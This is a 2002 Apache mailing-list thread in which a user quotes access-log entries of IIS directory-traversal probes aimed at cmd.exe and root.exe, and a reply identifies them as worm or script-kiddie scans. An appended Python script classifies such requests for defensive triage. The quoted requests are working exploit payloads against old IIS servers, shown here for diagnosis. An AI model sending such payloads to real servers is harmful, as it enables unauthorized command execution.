httpd-users mailing list archives

From "Jack L. Stone" <jackst...@sage-one.net>
Subject Re: Am I being probed?
Date Sun, 28 Jul 2002 16:01:34 GMT
At 06:03 PM 7.28.2002 +0200, eric wrote:
>Greetings!
>
>I'm a newbie when it comes to many *nix things and Apache is one of them.  
>
>I have two machines, one running Suse 8.0 and the other running WinME.  Both 
>of them are hooked up to a LinkSys EtherFast DSL router.  My Suse box is 
>running Apache 2.0.39.
>
>I use WinMe to connect to the web server.  Its address is 192.168.1.100 and 
>the Suse box is 192.168.1.101.
>
>I was going through my Apache access log and found these entries:
>
>217.228.40.62 - - [27/Jul/2002:19:16:05 +0200] "GET /scripts/root.exe?/c+dir 
>HTTP/1.0" 404 787
>217.228.40.62 - - [27/Jul/2002:19:16:10 +0200] "GET /MSADC/root.exe?/c+dir 
>HTTP/1.0" 404 787
>217.228.40.62 - - [27/Jul/2002:19:16:15 +0200] "GET 
>/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.228.40.62 - - [27/Jul/2002:19:16:21 +0200] "GET 
>/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.228.40.62 - - [27/Jul/2002:19:16:27 +0200] "GET 
>/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.228.40.62 - - [27/Jul/2002:19:16:32 +0200] "GET 
>/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
>HTTP/1.0" 404 787
>217.228.40.62 - - [27/Jul/2002:19:16:38 +0200] "GET 
>/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
>HTTP/1.0" 404 787
>217.228.40.62 - - [27/Jul/2002:19:16:44 +0200] "GET 
>/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir 
>HTTP/1.0" 404 787
>217.228.40.62 - - [27/Jul/2002:19:16:50 +0200] "GET 
>/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.228.40.62 - - [27/Jul/2002:19:16:56 +0200] "GET 
>/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.228.40.62 - - [27/Jul/2002:19:17:02 +0200] "GET 
>/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.228.40.62 - - [27/Jul/2002:19:17:08 +0200] "GET 
>/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.228.40.62 - - [27/Jul/2002:19:17:14 +0200] "GET 
>/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
>217.228.40.62 - - [27/Jul/2002:19:17:19 +0200] "GET 
>/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
>217.228.40.62 - - [27/Jul/2002:19:17:25 +0200] "GET 
>/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.228.40.62 - - [27/Jul/2002:19:17:31 +0200] "GET 
>/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>
>
>217.235.140.189 - - [27/Jul/2002:19:45:51 +0200] "GET /scripts/root.exe?/c+dir 
>HTTP/1.0" 404 787
>217.235.140.189 - - [27/Jul/2002:19:45:52 +0200] "GET /MSADC/root.exe?/c+dir 
>HTTP/1.0" 404 787
>217.235.140.189 - - [27/Jul/2002:19:45:52 +0200] "GET 
>/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.235.140.189 - - [27/Jul/2002:19:45:52 +0200] "GET 
>/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.235.140.189 - - [27/Jul/2002:19:45:53 +0200] "GET 
>/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.235.140.189 - - [27/Jul/2002:19:45:53 +0200] "GET 
>/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
>HTTP/1.0" 404 787
>217.235.140.189 - - [27/Jul/2002:19:45:53 +0200] "GET 
>/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
>HTTP/1.0" 404 787
>217.235.140.189 - - [27/Jul/2002:19:45:54 +0200] "GET 
>/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir 
>HTTP/1.0" 404 787
>217.235.140.189 - - [27/Jul/2002:19:45:54 +0200] "GET 
>/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.235.140.189 - - [27/Jul/2002:19:45:54 +0200] "GET 
>/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.235.140.189 - - [27/Jul/2002:19:45:55 +0200] "GET 
>/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.235.140.189 - - [27/Jul/2002:19:45:55 +0200] "GET 
>/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.235.140.189 - - [27/Jul/2002:19:45:56 +0200] "GET 
>/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
>217.235.140.189 - - [27/Jul/2002:19:45:56 +0200] "GET 
>/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
>217.235.140.189 - - [27/Jul/2002:19:45:56 +0200] "GET 
>/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.235.140.189 - - [27/Jul/2002:19:45:57 +0200] "GET 
>/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>
>
>217.228.92.217 - - [27/Jul/2002:20:30:53 +0200] "GET 
>/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
>217.228.92.217 - - [27/Jul/2002:20:30:54 +0200] "GET 
>/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
>217.228.92.217 - - [27/Jul/2002:20:30:56 +0200] "GET 
>/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.228.92.217 - - [27/Jul/2002:20:30:57 +0200] "GET 
>/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>
>
>80.60.131.235 - - [28/Jul/2002:13:37:50 +0200] "GET /scripts/root.exe?/c+dir 
>HTTP/1.0" 404 787
>80.60.131.235 - - [28/Jul/2002:13:37:50 +0200] "GET /MSADC/root.exe?/c+dir 
>HTTP/1.0" 404 787
>80.60.131.235 - - [28/Jul/2002:13:37:50 +0200] "GET 
>/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>80.60.131.235 - - [28/Jul/2002:13:37:51 +0200] "GET 
>/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>80.60.131.235 - - [28/Jul/2002:13:37:51 +0200] "GET 
>/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>80.60.131.235 - - [28/Jul/2002:13:37:51 +0200] "GET 
>/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
>HTTP/1.0" 404 787
>80.60.131.235 - - [28/Jul/2002:13:37:52 +0200] "GET 
>/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
>HTTP/1.0" 404 787
>80.60.131.235 - - [28/Jul/2002:13:37:52 +0200] "GET 
>/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir 
>HTTP/1.0" 404 787
>80.60.131.235 - - [28/Jul/2002:13:37:52 +0200] "GET 
>/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>80.60.131.235 - - [28/Jul/2002:13:37:53 +0200] "GET 
>/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>80.60.131.235 - - [28/Jul/2002:13:37:53 +0200] "GET 
>/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>80.60.131.235 - - [28/Jul/2002:13:37:53 +0200] "GET 
>/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>80.60.131.235 - - [28/Jul/2002:13:37:54 +0200] "GET 
>/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
>80.60.131.235 - - [28/Jul/2002:13:37:54 +0200] "GET 
>/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
>80.60.131.235 - - [28/Jul/2002:13:37:54 +0200] "GET 
>/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>80.60.131.235 - - [28/Jul/2002:13:37:55 +0200] "GET 
>/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>
>
>and there are a few more.
>
>What's going on here?  Is there any way I can find out?  Should I bother?  
>Should I care?
>
>Thanks, Eric
>
You would only need to care if you were running a WIN server... it is
probably the "script kiddies" trying to wreak some havoc by trying to run
their scripts (worm) on yours/any machine in its search on the net....

Best regards,
Jack L. Stone,
Administrator

SageOne Net
http://www.sage-one.net
jackstone@sage-one.net
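
An added triage example, not part of the original message: it classifies access-log lines like the ones quoted above and reports, per source address, whether any probe got a non-error response. The function names and tag labels are hypothetical; the first four sample lines are taken from the quoted log and the last one is constructed.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_to_bytes

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) \S+')
TARGETS = (b"cmd.exe", b"root.exe")      # Windows binaries requested in the quoted log
TRAVERSAL = re.compile(rb"\.\.[/\\]")    # ../ or ..\ once decoding is finished
BAD_LEAD = re.compile(rb"[\xc0\xc1]")    # lead bytes that never occur in valid UTF-8

def decode_fully(uri_path, max_rounds=5):
    """Percent-decode until the value stops changing; return (bytes, rounds)."""
    data, rounds = uri_path.encode("utf-8"), 0
    while rounds < max_rounds:
        nxt = unquote_to_bytes(data)
        if nxt == data:
            break
        data, rounds = nxt, rounds + 1
    return data, rounds

def classify(line):
    """Return (ip, status, tags) for one access-log line, or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, uri, status = m.group(1), m.group(2), int(m.group(3))
    path, rounds = decode_fully(uri.split("?", 1)[0])
    checks = {
        "win-shell-target": any(t in path.lower() for t in TARGETS),
        "traversal": bool(TRAVERSAL.search(path)),
        "multi-encoded": rounds >= 2,                 # e.g. %255c -> %5c -> backslash
        "invalid-utf8": bool(BAD_LEAD.search(path)),  # e.g. %c0%af, %c1%1c
    }
    return ip, status, {name for name, hit in checks.items() if hit}

def summarize(lines):
    """Per source IP: probes seen, probes that were NOT rejected, union of tags."""
    report = defaultdict(lambda: {"probes": 0, "served": 0, "tags": set()})
    for ip, status, tags in filter(None, map(classify, lines)):
        if tags:
            report[ip]["probes"] += 1
            report[ip]["tags"] |= tags
            report[ip]["served"] += status < 400   # a 2xx/3xx here needs a closer look
    return dict(report)

SAMPLE = [  # lines 1-4 from the quoted log (unwrapped); line 5 is constructed
    '217.228.40.62 - - [27/Jul/2002:19:16:05 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 787',
    '217.228.40.62 - - [27/Jul/2002:19:16:27 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787',
    '217.228.40.62 - - [27/Jul/2002:19:16:50 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787',
    '217.228.92.217 - - [27/Jul/2002:20:30:53 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720',
    '192.168.1.100 - - [27/Jul/2002:19:20:00 +0200] "GET /index.html HTTP/1.0" 200 1456',
]
```

Calling `summarize(SAMPLE)` leaves `served` at 0 for both probing addresses, matching the 404 and 400 responses in the quoted log.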
